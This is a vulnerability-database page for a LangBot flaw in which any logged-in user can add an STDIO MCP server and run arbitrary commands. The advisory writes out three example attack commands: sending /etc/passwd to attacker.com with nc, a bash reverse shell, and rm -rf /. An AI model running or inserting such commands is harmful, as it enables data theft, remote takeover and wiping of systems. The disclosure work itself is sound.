CVE-2026-54449

HIGHPre-NVD 8.88.8
EchelonGraph scoreHIGH confidence

Score 8.8 from GitHub Security Advisory (severity: HIGH) published 2026-07-15. the CNA's CVSS baseline 8.8; sources differ by 0.0.

Triggered by: GitHub Security Advisory CVSS
Sources: cna:github_m, ghsa
8.8
EchelonGraph verdictPlan a fixSerious severity, but no confirmed exploitation yet.
  • High severity, but no confirmed exploitation yet
CISA-KEV: Not listedEPSS: CVSS: 8.8Exploit: NoneExposed: 0

No vendor fix yet — apply a workaround or compensating control (WAF / firewall / segmentation) and watch for a patch.

LangBot: Authenticated RCE Via MCP Configuration

Summary

Any authenticated user can achieve arbitrary command execution on the LangBot servers through changing the MCP Server Configuration by added an "STDIO" MCP with an arbitrary command.

Details

The repository uses StdioServerParameters which is based on Anthropic's modelcontextprotocol open source, inside the code - src/langbot/pkg/provider/tools/loaders/mcp.py - StdioServerParameters is imported from mcp, which executes a given command which runs a subprocess on the target machine.

Since the LangBot services are authenticated, an attacker finding an open server needs to sign up or login via stolen credentials, then the attacker can use the MCP configuration to enter any arbitrary command, giving the ability to completely take over the machine.

PoC

  • Open the LangBot server
  • Navigate to Extensions
  • Open the "MCP" tab and press "Add"
  • Choose an STDIO server configuration
  • Add any arbitrary command with arguments

Note that an attacker could use this configuration to enter any arbitrary command, including data exfiltration (cat /etc/passwd | nc attacker.com 4444), opening a reverse shell (bash -i >& /dev/tcp/10.0.0.1/8080 0>&1), potentially removing the whole machine's data (rm -rf / --no-preserve-root), and many more.

Impact

This is an authenticated remote code execution vulnerability (RCE), affecting any publicly available LangBot instance, and local instances when in the same network as the attacker (Lateral Movement). CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection').

Video POC

https://github.com/user-attachments/assets/4868d232-7453-442c-bffd-60f0ad4679ea

Resources

https://www.ox.security/blog/the-mother-of-all-ai-supply-chains-critical-systemic-vulnerability-at-the-core-of-the-mcp/ https://www.ox.security/blog/mcp-supply-chain-advisory-rce-vulnerabilities-across-the-ai-ecosystem/

CVSS v3
8.8
EG Score
8.8(high)
EPSS
KEV
Not listed

Published

July 15, 2026

Last Modified

July 15, 2026

Vendor Advisories for CVE-2026-54449(1)

These vendors published their own advisory mentioning this CVE — often with vendor-specific remediation steps + affected product lists not in NVD.

Patch Availability(1)

Vendor / EcosystemFixed in / PatchReleasedSource
piplangbotghsa

Patches are aggregated from vendor advisories (Red Hat, Microsoft, Cisco, GitHub) and package ecosystems (OSV, GHSA). Multiple rows for the same upstream release have been deduplicated.

Weakness Classification(1)

MITRE Common Weakness Enumeration — the root-cause categories this CVE belongs to.

Data Freshness Timeline

(refreshed 2× in last 7d / 2× in last 30d)

Each row is a source pipeline that fetched or updated this CVE on that date, with what changed. For example, "NVD update" means NVD published or revised its analysis for this CVE; "MITRE cvelistV5" means we ingested or refreshed it from the CNA feed. Most recent first.

  1. 2026-07-15 17:54 UTCEG score recompute
  2. 2026-07-15 17:54 UTCGHSA enrichment

Frequently asked(4)

What is CVE-2026-54449?
CVE-2026-54449 is a high vulnerability published on July 15, 2026. LangBot: Authenticated RCE Via MCP Configuration Summary Any authenticated user can achieve arbitrary command execution on the LangBot servers through changing the MCP Server Configuration by added an "STDIO" MCP with an arbitrary command. Details The repository uses StdioServerParameters which is…
When was CVE-2026-54449 disclosed?
CVE-2026-54449 was first published in the National Vulnerability Database on July 15, 2026. EchelonGraph re-ingests CVE updates from NVD on a 2-hour cycle, so this page reflects the latest published state.
What is the CVSS score of CVE-2026-54449?
CVE-2026-54449 has a CVSS v4.0 base score of 8.8 (CNA self-assessment; NVD's own analysis pending).
How do I remediate CVE-2026-54449?
Patch to the fixed version published by the affected vendor. Where vendor advisories exist for CVE-2026-54449, EchelonGraph cross-links them in the Vendor Advisories panel below — those typically contain the canonical remediation steps, fixed version numbers, and any vendor-specific mitigations.

Dependency Blast Radius

Explore the affected products and dependency analysis for CVE-2026-54449

Explore →

Is Your Infrastructure Affected by CVE-2026-54449?

EchelonGraph automatically scans your cloud infrastructure and maps CVE exposure using blast radius analysis.